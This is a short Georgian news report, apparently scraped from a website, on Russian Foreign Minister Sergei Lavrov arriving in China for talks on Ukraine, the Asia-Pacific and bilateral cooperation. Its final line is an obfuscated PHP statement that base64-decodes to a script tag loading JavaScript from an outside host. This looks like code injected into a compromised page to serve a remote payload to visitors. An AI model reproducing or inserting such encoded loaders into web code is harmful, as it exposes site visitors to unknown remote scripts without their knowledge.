celsiusi
ავერსი საქკაბელი

 რუსეთის საგარეო საქმეთა მინისტრი სერგეი ლავროვი ოფიციალური ვიზიტით ჩინეთში ჩავიდა. ამის შესახებ ინფორმაციას რუსული მედია ავრცელებს.

მანამდე რუსეთის საგარეო საქმეთა სამინისტროს ოფიციალურმა წარმომადგენელმა, მარია ზახაროვამ აღნიშნა, რომ ლავროვი მოლაპარაკებებს ჩინეთის საგარეო საქმეთა მინისტრთან გამართავს. ზახაროვას განმარტებით, სხვა საკითხებთან ერთად, კოლეგები განიხილავენ უკრაინასა და აზია-წყნარი ოკეანის რეგიონში არსებულ ვითარებას, ასევე ორმხრივი თანამშრომლობის საკითხებს.

სერგეი ლავროვის ვიზიტი 9 აპრილამდე გაგრძელდება. რუსეთის საგარეო საქმეთა მინისტრი პეკინს ბოლოს 2023 წლის ოქტომბერში, საერთაშორისო ფორუმის ფარგლებში ეწვია.

160
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");